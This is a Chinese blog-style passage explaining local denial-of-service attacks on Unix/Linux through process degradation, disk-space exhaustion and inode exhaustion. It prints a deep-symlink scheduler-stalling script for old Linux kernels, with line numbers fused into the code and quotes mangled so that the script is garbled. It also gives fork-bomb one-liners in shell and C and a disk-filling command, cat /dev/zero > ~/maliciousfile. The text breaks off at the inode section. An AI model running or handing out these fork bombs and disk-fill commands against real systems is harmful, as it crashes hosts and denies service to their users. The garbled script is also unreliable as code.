本地DoS攻击
DoS可通过本地和远程进行攻击。攻击一般通过降低进程和存储能力,破坏文件以让资源不可用以及关闭系统或进程的某一部分等方式。其中本地攻击的方式通常有三种:process degradation, disp space exhaustion和index node(inode) exhaustion。
(1)Process Degradation
攻击者启动许多进程耗掉主机资源,产生许多进程填充系统进程表或让CPU过载。例如在Linux内核2.4.12以前,创建一个deep symbolic links便可阻止进程调度,从而让其它进程获取不到CPU时间,下面是mklink.sh脚本源代码:
#!/bin/sh2

3
# by Nergal4

5
mklink()6

7
{8

9
IND=$110

11
NXT=$(($IND+1))12

13
EL=l$NXT/../14

15
P=””16

17
I=018

19
While[$I –lt $ELNUM ] ; do20

21
P=$P”$EL”22

23
I=$(($I+1))24

25
done26

27
ln –s “$P”l$2 l$IND28

29
}30

31
#main program32

33
if [ $# != 1 ] ; then34

35
echo A numerical argument is required.36

37
Exit 038

39
Fi40

41
ELNUM=$142

43
mklink 444

45
mklink 346

47
mklink 248

49
mklink 150

51
mklink 0 /../../../../../../etc/services52

53
mklink l554

55
mklink l56

57

另一种本地DoS的方式是fork bomb,它对很多系统都存在,可以用很简单的shell或C实现,如
($0 & $0 &) //shell实现
(main(){for(;;)fork();}) //C实现
(2)Disk Space Exhaustion
该类型攻击包括阻止创建新文件,已存在的文件不能增长等。一些UNIX操作系统当根分区达到存储限制时便会崩溃,所以很多管理员都会为日志而建立一个新分区如/var,为用户建立一个独立的分区如/home等。如果没有这样建立,那可能就会被hacker利用,它们通过syslog产生许多日志以填充分区。
这样的攻击很容易,一个本地用户可以通过如下一条简单命令便把0填充到maliciousfile文件中,直到用户终止或分区被填充满。
cat /dev/zero > ~/maliciousfile
这类的攻击也可以通过mail bombing实施,不过mail很容易通过SMTP头进行跟踪。
(3)Inode耗尽
这类攻击一般是对于特定的文件系统,特别是UNIX文件系统。它通过耗尽所有可用的inode而发生。


浙公网安备 33010602011771号